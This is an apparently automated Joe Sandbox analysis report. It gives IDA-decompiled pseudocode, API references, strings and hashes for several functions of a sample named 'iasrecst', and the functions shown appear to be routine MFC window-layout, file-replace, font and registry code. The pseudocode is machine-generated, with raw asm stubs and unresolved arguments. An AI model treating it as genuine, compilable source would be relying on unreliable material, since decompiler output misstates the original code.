Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: H_prolog$Message$AbortCreateProcStartTimeUpdateWindow
String ID:
API String ID: 900908304-0
Opcode ID: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
Instruction ID: b1286eb136246b1ee29ef1a1e14188ff5951a4f8bc16bfaf6e35fdac19ebc766
Opcode Fuzzy Hash: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
Instruction Fuzzy Hash: 1C127070E01219EFCF14EBA4D885AEDBBB4BF14308F5040AEE515B3292DB789A44DF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041D717, Relevance: 21.4, APIs: 14, Instructions: 390
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D717(void* __ebx, intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				struct tagRECT _v32;
				int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				struct tagRECT _v88;
				struct tagRECT _v104;
				int _v136;
				char _v144;
				intOrPtr* _t191;
				intOrPtr _t197;
				signed int _t199;
				intOrPtr* _t205;
				intOrPtr _t213;
				signed int _t215;
				long _t218;
				signed int _t219;
				signed int _t225;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr _t238;
				intOrPtr _t239;
				int _t244;
				signed int _t245;
				signed int _t249;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t269;
				signed int _t273;
				signed int _t277;
				long _t285;
				void* _t293;
				signed int _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t305;
				long _t312;
				int _t322;
				long _t327;
				signed int _t333;
				intOrPtr _t336;
				RECT* _t341;
				signed int _t342;
				intOrPtr* _t343;
				int _t345;

				_t293 = __ebx;
				_t336 = __ecx;
				_v68 = __ecx;
				_t191 = E0041E6BA( &_v64, _a8, _a12);
				_t341 = _t336 + 0x94;
				_v12 =  *_t191;
				_v8 =  *((intOrPtr*)(_t191 + 4));
				if(IsRectEmpty(_t341) != 0) {
					GetClientRect( *(E00414C6C(_t336) + 0x1c),  &_v88);
					_t197 = _v88.right - _v88.left;
					_t305 = _v88.bottom - _v88.top;
				} else {
					_t197 = _t341->right - _t341->left;
					_t305 = _t341->bottom - _t341->top;
				}
				_t342 = 0;
				_v48 = _t197;
				_v44 = _t305;
				if( *((intOrPtr*)(_t336 + 0x90)) == 0) {
					_v136 = BeginDeferWindowPos( *(_t336 + 0x84));
				} else {
					_v136 = 0;
				}
				_t199 =  *0x439bf0; // 0x2
				_push(_t293);
				_t294 =  *0x439bf4; // 0x2
				_v40 = _t342;
				_t295 =  ~_t294;
				_v56 =  ~_t199;
				_v36 = _t342;
				_v16 = _t342;
				if( *(_t336 + 0x84) <= _t342) {
					L73:
					if( *((intOrPtr*)(_t336 + 0x90)) == _t342 && _v136 != _t342) {
						EndDeferWindowPos(_v136);
					}
					SetRectEmpty( &_v104);
					E0041F52D(_t336,  &_v104, _a12);
					if(_a8 == _t342 || _a12 == _t342) {
						if(_v12 != _t342) {
							_v12 = _v12 + _v104.left - _v104.right;
						}
					}
					if(_a8 == _t342 || _a12 != _t342) {
						if(_v8 != _t342) {
							_v8 = _v8 + _v104.top - _v104.bottom;
						}
					}
					_t205 = _a4;
					 *_t205 = _v12;
					 *((intOrPtr*)(_t205 + 4)) = _v8;
					return _t205;
				} else {
					do {
						_t343 = E0041DD28(_t336, _v16);
						_v72 = _t343;
						_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _v16 * 4));
						if(_t343 == 0) {
							if(_t213 != 0) {
								goto L71;
							}
							L58:
							_t215 = _v40;
							if(_t215 != 0) {
								if(_a12 == 0) {
									_t312 = _v56 + _t215 -  *0x439bf0;
									_v56 = _t312;
									if(_v12 <= _t312) {
										_v12 = _t312;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t299 =  *0x439bf4; // 0x2
									_t295 =  ~_t299;
								} else {
									_t295 = _t295 + _t215 -  *0x439bf4;
									_t218 = _v56;
									if(_v12 <= _t218) {
										_v12 = _t218;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t219 =  *0x439bf0; // 0x2
									_v56 =  ~_t219;
								}
								_v40 = _v40 & 0x00000000;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t343 + 0xc8))() == 0) {
							L51:
							if(_v36 != 0) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t343 + 0xcc))( &_v136);
							goto L71;
						}
						_t225 =  *(_t343 + 0x64);
						if((_t225 & 0x00000004) == 0 || (_t225 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t229 = ( ~(_t225 & 0x0000a000) & 0x000000fa) + 0x10;
						} else {
							_t229 = 6;
						}
						_t231 =  *((intOrPtr*)( *_t343 + 0xbc))( &_v144, 0xffffffff, _t229);
						_t327 = _v56;
						_v64 =  *_t231;
						_v60 =  *((intOrPtr*)(_t231 + 4));
						_v32.left = _t327;
						_v32.bottom =  *((intOrPtr*)(_t231 + 4)) + _t295;
						_v32.right =  *_t231 + _t327;
						_v32.top = _t295;
						GetWindowRect( *(_t343 + 0x1c),  &_v88);
						E0041A2F1(_t336,  &_v88);
						_t322 = 0;
						if(_a12 == 0) {
							_t238 = _v88.top;
							if(_t238 > _v32.top &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, 0, _t238 - _v32.top);
								_t322 = 0;
							}
							_t239 = _v32.bottom;
							if(_t239 > _v44 &&  *((intOrPtr*)(_t336 + 0x78)) == _t322) {
								_t333 = _v44 - _t239 - _v32.top -  *0x439bf4;
								_t256 = _t333;
								if(_t333 <= _t295) {
									_t256 = _t295;
								}
								OffsetRect( &_v32, _t322, _t256 - _v32.top);
								_t322 = 0;
							}
							if(_v36 == _t322) {
								if(_v32.top < _v44 -  *0x439bf4) {
									goto L44;
								}
								_t249 = _v16;
								if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x439bf4; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32, _t322,  ~(_v32.top + _t251));
								L44:
								_t244 = EqualRect( &_v32,  &_v88);
								if(_t244 == 0) {
									if( *((intOrPtr*)(_t336 + 0x90)) == _t244 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t343 = _v72;
										_t336 = _v68;
									}
									E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
								}
								_t245 = _v64;
								_t295 = _v32.top -  *0x439bf4 + _v60;
								if(_v40 > _t245) {
									goto L52;
								} else {
									_v40 = _t245;
									goto L51;
								}
							}
						} else {
							_t263 = _v88.left;
							if(_t263 > _v32.left &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, _t263 - _v32.left, 0);
								_t322 = 0;
							}
							_t264 = _v32.right;
							if(_t264 <= _v48 ||  *((intOrPtr*)(_t336 + 0x78)) != _t322) {
								L22:
								if(_v36 == _t322) {
									if(_v32.left < _v48 -  *0x439bf0) {
										L27:
										_t269 = EqualRect( &_v32,  &_v88);
										if(_t269 == 0) {
											if( *((intOrPtr*)(_t336 + 0x90)) == _t269 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t343 = _v72;
												_t336 = _v68;
											}
											E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
										}
										_v56 = _v64 -  *0x439bf0 + _v32.left;
										_t273 = _v60;
										if(_v40 <= _t273) {
											_v40 = _t273;
										}
										goto L52;
									}
									_t249 = _v16;
									if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
										goto L27;
									} else {
										L56:
										_t345 = 1;
										E004115B1(_t336 + 0x7c, _t249, _t322, _t345);
										_v36 = _t345;
										goto L58;
									}
								}
								_t277 =  *0x439bf0; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32,  ~(_t277 + _v32.left), _t322);
								goto L27;
							} else {
								_t285 = _v48 - _t264 -  *0x439bf0 - _v32.left;
								if(_t285 <= _v56) {
									_t285 = _v56;
								}
								OffsetRect( &_v32, _t285 - _v32.left, _t322);
								_t322 = 0;
								goto L22;
							}
						}
						L71:
						_v16 = _v16 + 1;
					} while (_v16 <  *(_t336 + 0x84));
					_t342 = 0;
					goto L73;
				}
			}

APIs

IsRectEmpty.USER32(?), ref: 0041D748
GetClientRect.USER32 ref: 0041D76D
BeginDeferWindowPos.USER32 ref: 0041D79D
GetWindowRect.USER32 ref: 0041D862
OffsetRect.USER32(?,?,00000000), ref: 0041D894
OffsetRect.USER32(?,?,00000000), ref: 0041D8CA
OffsetRect.USER32(?,00000002,00000000), ref: 0041D8EC
EqualRect.USER32 ref: 0041D921
OffsetRect.USER32(?,00000000,?), ref: 0041D99B
OffsetRect.USER32(?,00000000,?), ref: 0041D9CF
OffsetRect.USER32(?,00000000,?), ref: 0041D9F5
EqualRect.USER32 ref: 0041DA03
EndDeferWindowPos.USER32(?), ref: 0041DB48
SetRectEmpty.USER32(?), ref: 0041DB52

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
String ID:
API String ID: 3160784657-0
Opcode ID: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
Instruction ID: 4bc4fb7537ac9ebda1473157cc7a63845d4aad135b3ed423640b2285e9e568f1
Opcode Fuzzy Hash: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
Instruction Fuzzy Hash: 19F1F9B1E0021ADFCF14DFA8D984AEEB7B5FF08305F14816AE516E7251D738A981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418E48, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 168
stringlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00418E48(intOrPtr __ecx) {
				void* __edi;
				void* __esi;
				void* _t60;
				CHAR* _t61;
				_Unknown_base(*)()* _t67;
				void* _t70;
				CHAR* _t73;
				short* _t79;
				CHAR* _t82;
				short* _t88;
				CHAR* _t91;
				void* _t112;
				long _t114;
				short* _t116;
				intOrPtr _t118;
				int _t122;
				int _t124;
				int _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				short* _t133;
				intOrPtr _t135;

				E00406520(E00429FEC, _t127);
				_t130 = _t129 - 0x20;
				_t118 = __ecx;
				_push(_t112);
				 *((intOrPtr*)(_t127 - 0x1c)) = __ecx;
				E00416861(_t127 - 0x18, __ecx + 0xc);
				 *(_t127 - 4) = 0;
				E004179D8(_t118, _t112, _t118);
				if( *((intOrPtr*)( *(_t118 + 0x10) - 8)) != 0) {
					_t61 =  *0x436980; // 0x436994
					_t114 = 0;
					 *(_t127 - 0x14) = _t61;
					_t135 =  *0x439c38; // 0x0
					 *(_t127 - 4) = 1;
					if(_t135 != 0) {
						L15:
						E00417B0B( *(_t127 - 0x18));
						goto L16;
					} else {
						_t67 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFile");
						_t136 = _t67;
						 *(_t127 - 0x2c) = _t67;
						if(_t67 == 0) {
							goto L15;
						} else {
							_push(0);
							_push( *(_t118 + 0x10));
							_push(_t127 - 0x28);
							_t70 = E00418BE2(_t136);
							_t133 = _t130 + 0xc;
							 *(_t127 - 4) = 2;
							E00416B95(_t127 - 0x14, _t127, _t70);
							_t111 = _t127 - 0x28;
							 *(_t127 - 4) = 1;
							E00416AEC(_t127 - 0x28);
							_t73 =  *(_t127 - 0x14);
							 *(_t127 - 0x10) = _t73;
							if(_t73 != 0) {
								_t122 = lstrlenA(_t73) + 1;
								__eflags = _t122 + _t122 + 0x00000003 & 0x000000fc;
								E00406830(_t122 + _t122 + 0x00000003 & 0x000000fc, _t111);
								_t79 = _t133;
								 *(_t127 - 0x24) = _t79;
								 *_t79 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t79, _t122);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
								 *(_t127 - 0x20) =  *(_t127 - 0x24);
							} else {
								 *(_t127 - 0x20) = 0;
							}
							_t82 =  *(_t118 + 0x10);
							 *(_t127 - 0x10) = _t82;
							if(_t82 != 0) {
								_t124 = lstrlenA(_t82) + 1;
								__eflags = _t124 + _t124 + 0x00000003 & 0x000000fc;
								E00406830(_t124 + _t124 + 0x00000003 & 0x000000fc, _t111);
								_t88 = _t133;
								 *(_t127 - 0x24) = _t88;
								 *_t88 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t88, _t124);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								 *(_t127 - 0x24) = 0;
							}
							_t91 =  *(_t127 - 0x18);
							 *(_t127 - 0x10) = _t91;
							if(_t91 != 0) {
								_t126 = lstrlenA(_t91) + 1;
								__eflags = _t126 + _t126 + 0x00000003 & 0x000000fc;
								E00406830(_t126 + _t126 + 0x00000003 & 0x000000fc, _t111);
								_t116 = _t133;
								 *_t116 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t116, _t126);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								_t116 = 0;
							}
							_push(0);
							_push(0);
							_push(3);
							_push( *(_t127 - 0x20));
							_push( *(_t127 - 0x24));
							_push(_t116);
							if( *(_t127 - 0x2c)() != 0) {
								E00417B0B( *(_t127 - 0x14));
							} else {
								_t114 = GetLastError();
								if(_t114 == 0x498 || _t114 == 0) {
									goto L15;
								}
								L16:
								if(_t114 == 0x499) {
									E00417B0B( *(_t127 - 0x14));
								}
								E00417AE9( *(_t118 + 0x10),  *(_t127 - 0x18));
							}
						}
					}
					 *(_t127 - 4) = 0;
					E00416AEC(_t127 - 0x14);
				}
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				_t60 = E00416AEC(_t127 - 0x18);
				 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0xc));
				return _t60;
			}

APIs

__EH_prolog.LIBCMT ref: 00418E4D

Part of subcall function 00416861: InterlockedIncrement.KERNEL32(?), ref: 00416876

Part of subcall function 004179D8: CloseHandle.KERNEL32(00000001,?,?,0041772F,?,?,004176CD), ref: 004179E7
Part of subcall function 004179D8: GetLastError.KERNEL32(00000000,0041772F,?,?,004176CD), ref: 00417A0C

GetModuleHandleA.KERNEL32(KERNEL32,?), ref: 00418EA0
GetProcAddress.KERNEL32(00000000,ReplaceFile), ref: 00418EAC

Part of subcall function 00418BE2: __EH_prolog.LIBCMT ref: 00418BE7
Part of subcall function 00418BE2: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
Part of subcall function 00418BE2: GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40

Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00

lstrlenA.KERNEL32(?), ref: 00418EFD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00418F20
lstrlenA.KERNEL32(?,?,00000001), ref: 00418F3F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001), ref: 00418F62
lstrlenA.KERNEL32(?,?,00000001,?,00000001), ref: 00418F80
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001,?,00000001), ref: 00418FA0
GetLastError.KERNEL32(?,?,?,00000003,00000000,00000000,?,00000001,?,00000001,?,00000001), ref: 00418FBB

Strings

ReplaceFile, xrefs: 00418EA6
KERNEL32, xrefs: 00418E9B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$ErrorH_prologHandleInterlockedLastName$AddressCloseDecrementFileFullIncrementModulePathProcTemp
String ID: KERNEL32$ReplaceFile
API String ID: 3306742873-430465611
Opcode ID: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
Instruction ID: 35d1a50c5f76602bfe157e4308a6fe3e42fd926e881e06ee79976fcc1b195d94
Opcode Fuzzy Hash: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
Instruction Fuzzy Hash: 4B516FB2D00219AFCB10EFA5CC858EFBBB9EF08354B51056EE411B3250DB389E45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00422A19, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 111
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00422A19(void* __edi, void* __esi) {
				void* _t28;
				void* _t31;
				void* _t42;
				struct HFONT__* _t50;
				void* _t53;
				void* _t64;
				void* _t65;
				void* _t67;
				void* _t70;
				intOrPtr _t76;
				void* _t77;
				void* _t79;
				void* _t86;

				_t67 = __esi;
				_t64 = __edi;
				_t28 = E00406520(E0042A954, _t70);
				_t76 =  *0x439c44; // 0x1
				if(_t76 != 0) {
					L21:
					 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
					return _t28;
				}
				E00425F56(0xa);
				_t77 =  *0x439ca4; // 0x0
				if(_t77 == 0) {
					_t53 = LoadBitmapA( *(E00424BFB() + 0xc), 0x7912);
					 *0x439ca4 = _t53;
					if(GetObjectA(_t53, 0x18, _t70 - 0x78) != 0) {
						 *0x439c98 =  *((intOrPtr*)(_t70 - 0x74));
						 *0x439c9c =  *((intOrPtr*)(_t70 - 0x70));
					}
				}
				_t79 =  *0x439ca0; // 0x0
				if(_t79 != 0) {
					L11:
					_push(_t67);
					_push(_t64);
					_push(0);
					E0041A369(_t70 - 0x24, _t82);
					_t31 =  *0x439ca0; // 0x0
					 *(_t70 - 4) = 0;
					if(_t31 == 0) {
						_t65 = 0;
						__eflags = 0;
					} else {
						_t65 = SelectObject( *(_t70 - 0x20), _t31);
					}
					 *((intOrPtr*)(_t70 - 0x10)) = GetTextMetricsA( *(_t70 - 0x1c), _t70 - 0xb0);
					if(_t65 != 0) {
						SelectObject( *(_t70 - 0x20), _t65);
					}
					if( *((intOrPtr*)(_t70 - 0x10)) == 0) {
						L18:
						E0041A89B(0x439ca0);
						goto L19;
					} else {
						_t86 =  *(_t70 - 0xb0) -  *((intOrPtr*)(_t70 - 0xa4)) -  *0x439c9c; // 0x0
						if(_t86 <= 0) {
							L19:
							 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
							E0041A3DB(_t70 - 0x24);
							goto L20;
						}
						goto L18;
					}
				} else {
					E00406330(_t70 - 0x60, 0, 0x3c);
					 *((char*)(_t70 - 0x49)) = 1;
					 *((intOrPtr*)(_t70 - 0x50)) = 0x190;
					_t42 = 1;
					 *(_t70 - 0x60) = _t42 -  *0x439c9c;
					if(GetSystemMetrics(0x2a) == 0) {
						_push("Small Fonts");
					} else {
						_push("Terminal");
					}
					lstrcpyA(_t70 - 0x44, ??);
					if(E0041A6E1(0xf233, _t70 - 0x60) == 0) {
						 *((char*)(_t70 - 0x45)) = 0x20;
					}
					_t50 = CreateFontIndirectA(_t70 - 0x60);
					_t82 = _t50;
					 *0x439ca0 = _t50;
					if(_t50 == 0) {
						L20:
						_t28 = E00425FC6(0xa);
						goto L21;
					} else {
						goto L11;
					}
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00422A1E

Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
Part of subcall function 00425F56: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
Part of subcall function 00425F56: LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE

LoadBitmapA.USER32 ref: 00422A55
GetObjectA.GDI32(00000000,00000018,?), ref: 00422A67
GetSystemMetrics.USER32 ref: 00422AB1
lstrcpyA.KERNEL32(?,Small Fonts,?,0000000A), ref: 00422ACB
CreateFontIndirectA.GDI32(?), ref: 00422AEB
SelectObject.GDI32(?,00000000), ref: 00422B1B
GetTextMetricsA.GDI32(?,?), ref: 00422B2D
SelectObject.GDI32(?,00000000), ref: 00422B3E

Strings

Small Fonts, xrefs: 00422AC2
Terminal, xrefs: 00422ABB
, xrefs: 00422AE3

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
String ID: $Small Fonts$Terminal
API String ID: 1234877182-3042510724
Opcode ID: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
Instruction ID: af1173b3a4b80694a70ec61d8b55af463f2ab6573842c533f6f97c7bdcca2de6
Opcode Fuzzy Hash: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
Instruction Fuzzy Hash: 72417171B00219AFDB20DFA5ED85AAE7BB5FB04344F94013AE505E6191DBB85D01CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABA7, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 80
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041ABA7() {
				void* _v8;
				int _v12;
				int _v16;
				char _v144;
				void _t9;
				struct HWND__* _t20;
				void _t21;
				int _t22;
				int _t23;
				int _t27;
				short _t28;
				intOrPtr _t30;

				_t27 =  *0x437cdc; // 0x0
				if(_t27 != 0) {
					L16:
					_t9 =  *0x439c90; // 0x0
					return _t9;
				}
				_t28 =  *0x439c8c; // 0x0
				 *0x437cdc = 1;
				if(_t28 != 0) {
					L10:
					__eflags =  *0x439c8c - 2;
					if( *0x439c8c != 2) {
						L4:
						_t30 =  *0x439c3c; // 0x1
						 *0x439c90 = 3;
						if(_t30 != 0) {
							__eflags =  *0x439c38; // 0x0
							if(__eflags == 0) {
								SystemParametersInfoA(0x68, 0, 0x439c90, 0);
							}
						} else {
							if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop", 0, 1,  &_v8) == 0) {
								_v12 = 0x80;
								if(RegQueryValueExA(_v8, "WheelScrollLines", 0,  &_v16,  &_v144,  &_v12) == 0) {
									 *0x439c90 = E0040718F( &_v144, 0, 0xa);
								}
								RegCloseKey(_v8);
							}
						}
						goto L16;
					}
					_t20 = FindWindowA("MouseZ", "Magellan MSWHEEL");
					__eflags = _t20;
					if(_t20 == 0) {
						goto L4;
					}
					_t23 =  *0x439c88; // 0x0
					__eflags = _t23;
					if(_t23 == 0) {
						goto L4;
					}
					_t21 = SendMessageA(_t20, _t23, 0, 0);
					 *0x439c90 = _t21;
					return _t21;
				}
				_t22 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
				 *0x439c88 = _t22;
				if(_t22 != 0) {
					 *0x439c8c = 2;
					goto L10;
				} else {
					 *0x439c8c = 1;
					goto L4;
				}
			}

APIs

RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 0041ABDB
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop,00000000,00000001,?), ref: 0041AC1E
RegQueryValueExA.ADVAPI32(?,WheelScrollLines,00000000,?,?,?), ref: 0041AC4B
RegCloseKey.ADVAPI32(?), ref: 0041AC6F
FindWindowA.USER32 ref: 0041AC98
SendMessageA.USER32 ref: 0041ACB8
SystemParametersInfoA.USER32(00000068,00000000,00439C90,00000000), ref: 0041ACD6

Strings

Control Panel\Desktop, xrefs: 0041AC14
MSH_SCROLL_LINES_MSG, xrefs: 0041ABD6
Magellan MSWHEEL, xrefs: 0041AC8E
MouseZ, xrefs: 0041AC93
WheelScrollLines, xrefs: 0041AC43

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageWindow$CloseFindInfoOpenParametersQueryRegisterSendSystemValue
String ID: Control Panel\Desktop$MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ$WheelScrollLines
API String ID: 1228133072-821443377
Opcode ID: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
Instruction ID: 5c83e38d2889ea35cb43268cbe58cad34713885164d32870b4297f9966653a84
Opcode Fuzzy Hash: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
Instruction Fuzzy Hash: B0216F70A45214ABDB309B51EC49AEB3BB8FB00744F506026E405D2260EBB85DD5DFDE

Uniqueness

Uniqueness Score: -1.00%

Function 00421F4E, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00421F4E(void* __ecx, CHAR* _a4) {
				char _v520;
				intOrPtr _t36;
				intOrPtr _t45;
				void* _t55;
				void* _t56;

				_t55 = __ecx;
				if((E00416528(__ecx) & 0x00000040) == 0) {
					lstrcpyA( &_v520,  *(__ecx + 0xac));
					if(_a4 != 0) {
						lstrcatA( &_v520, " - ");
						lstrcatA( &_v520, _a4);
						_t36 =  *((intOrPtr*)(_t55 + 0x40));
						if(_t36 > 0) {
							_push(_t36);
							wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
						}
					}
					L9:
					return E0041A843( *((intOrPtr*)(_t55 + 0x1c)),  &_v520);
				}
				_v520 = _v520 & 0x00000000;
				if(_a4 == 0) {
					L5:
					lstrcatA( &_v520,  *(_t55 + 0xac));
					goto L9;
				}
				lstrcpyA( &_v520, _a4);
				_t45 =  *((intOrPtr*)(_t55 + 0x40));
				if(_t45 > 0) {
					_push(_t45);
					wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
				}
				lstrcatA( &_v520, " - ");
				goto L5;
			}

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

lstrcpyA.KERNEL32(00000000,00000000), ref: 00421F82
lstrlenA.KERNEL32(00000000,:%d,?), ref: 00421F9C
wsprintfA.USER32 ref: 00421FAA
lstrcatA.KERNEL32(00000000, - ), ref: 00421FBF
lstrcatA.KERNEL32(00000000,?), ref: 00421FCE
lstrcpyA.KERNEL32(?,?), ref: 00421FDF
lstrcatA.KERNEL32(?, - ), ref: 00421FFD
lstrcatA.KERNEL32(?,00000000), ref: 00422009
